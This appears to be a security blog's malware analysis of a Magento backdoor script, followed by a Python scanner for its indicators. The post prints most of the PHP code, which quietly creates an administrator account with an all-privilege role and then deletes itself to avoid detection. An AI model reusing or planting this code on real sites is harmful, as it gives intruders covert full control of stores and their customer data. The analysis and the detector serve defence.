Malicious Magento User Creator

We recently found a simple malicious script leveraging Magento's internal functions to create a new admin user with the admin role "Inchoo", a name that probably refers to a Croatian Magento consulting company.

The script is simple but very effective, and without closer inspection it can easily be overlooked as just another Magento file. It is based on a sample that has been circulating on the Internet since 2012 and provides a boilerplate that lets attackers easily specify the details of the user they want created.

Malicious User & Role Creation

The malicious script hard-codes the following constants, which are used to create the new user.

define('USERNAME','vivek291186');
define('EMAIL','ajit.jain@emizentech.com');
define('PASSWORD','<REDACTED>');

The script confirms that it is running inside a Magento installation by checking for the app/Mage.php bootstrap file, then loads it and initializes the application.

$mageFilename = 'app/Mage.php';
if (!file_exists($mageFilename)) {
 echo $mageFilename." was not found";
 exit;
}
require_once $mageFilename;
Mage::app();

If the check is successful, a new user is created using the previously defined variables.

try {
 //create new user write you firstname,lastname
 $user = Mage::getModel('admin/user')
  ->setData(array(
   'username'  => USERNAME,
   'firstname' => 'aaron',
   'lastname' => 'test',
   'email'     => EMAIL,
   'password'  => PASSWORD,
   'is_active' => 1
  ))->save();

Techniques to Evade Detection

The script then creates a new role named "Inchoo" and grants it every privilege ("all"), which makes it equivalent to a full administrator role for the website. Creating a separate role like this is likely an attempt to keep the new account from standing out if anyone reviews the list of administrators in the Magento backend.

try {
 //create new role
 $role = Mage::getModel("admin/roles")
   ->setName('Inchoo')
   ->setRoleType('G')
   ->save();

 //give "all" privileges to role
 Mage::getModel("admin/rules")
   ->setRoleId($role->getId())
   ->setResources(array("all"))
   ->saveRel();

The following code assigns the malicious user to the newly created role:

try {
 //assign user to role
 $user->setRoleIds(array($role->getId()))
  ->setRoleUserId($user->getUserId())
  ->saveRelations();

To reduce the chance of detection, the last step in the script deletes the file itself. Once the user has been added, it calls unlink() on __FILE__ so that no trace of the malicious file remains; the @ operator suppresses any PHP error should the deletion fail.

echo 'Admin User successfully created!<br /><br /><b>THIS FILE WILL NOW TRY TO DELETE ITSELF, BUT PLEASE CHECK TO BE SURE!</b>';
@unlink(__FILE__);

Conclusion & Mitigation Steps

Thankfully, we caught this malicious file before it was used and deleted. That being said, this malicious user creator clearly demonstrates how easy it is for attackers to add an extra admin user to Magento.

If the backdoor isn't properly removed from the website's environment, the file can remain and be used over and over to add new users with elevated privileges. This is especially likely when a website owner is unaware of the infection, or believes that simply removing the new user from Magento is enough to prevent unauthorized access.

The best solution to mitigate risk is to protect yourself from infection in the first place by hardening your website and using a web application firewall. You can also employ monitoring services to detect indicators of compromise and notify you if your website has been hacked.
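As an added, defender-side example (not Sucuri's code and not part of the analysed script), the following Python scans a Magento 1 webroot for PHP files that combine the indicators seen above: the Mage::app() bootstrap, the admin/user and admin/roles models, an all-privilege rule set and self-deletion via unlink(__FILE__). The indicator names and the two sample files are constructed for this example.

```python
import re
import tempfile
from pathlib import Path
# Indicators drawn from the script above; each is legitimate Magento 1 API
# usage alone, it is the combination in a stray webroot file that is suspicious.
INDICATORS = {
    "bootstrap":   re.compile(r"Mage::app\(\s*\)"),
    "user_model":  re.compile(r"Mage::getModel\(\s*['\"]admin/user['\"]\s*\)"),
    "role_model":  re.compile(r"Mage::getModel\(\s*['\"]admin/roles['\"]\s*\)"),
    "all_rules":   re.compile(r"setResources\(\s*array\(\s*['\"]all['\"]\s*\)\s*\)"),
    "self_delete": re.compile(r"@?unlink\(\s*__FILE__\s*\)"),
}

def scan_php_source(source: str) -> list[str]:
    """Return the names of the indicators present in one PHP source string."""
    return [name for name, pat in INDICATORS.items() if pat.search(source)]

def is_suspicious(hits: list[str]) -> bool:
    """Admin-user model plus all-privilege role or self-deletion; a lone admin/user use is normal."""
    return "user_model" in hits and ("all_rules" in hits or "self_delete" in hits)

def scan_tree(root: Path) -> dict[str, list[str]]:
    """Walk a Magento webroot and map each suspicious PHP file to its hits."""
    findings: dict[str, list[str]] = {}
    for path in root.rglob("*.php"):
        hits = scan_php_source(path.read_text(errors="ignore"))
        if is_suspicious(hits):
            findings[path.relative_to(root).as_posix()] = hits
    return findings

# Constructed inputs, not real files: a non-functional fragment carrying the
# indicators from the analysed script, and an ordinary admin/user lookup.
SAMPLE_BACKDOOR = """<?php
Mage::app();
$user = Mage::getModel('admin/user');
$role = Mage::getModel("admin/roles")->setName('Inchoo');
Mage::getModel("admin/rules")->setResources(array("all"));
@unlink(__FILE__);
"""
SAMPLE_BENIGN = """<?php
$admin = Mage::getModel('admin/user')->load(1); // normal module code
"""

def demo() -> dict[str, list[str]]:
    """Build a throwaway webroot holding both samples and scan it."""
    with tempfile.TemporaryDirectory() as tmp:
        root = Path(tmp)
        (root / "app" / "code").mkdir(parents=True)
        (root / "app" / "code" / "Data.php").write_text(SAMPLE_BENIGN)
        (root / "img.php").write_text(SAMPLE_BACKDOOR)
        return scan_tree(root)
```

Files flagged this way should be reviewed alongside the admin_user and admin_role tables, since a script that already ran has deleted itself and only the accounts it created remain.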
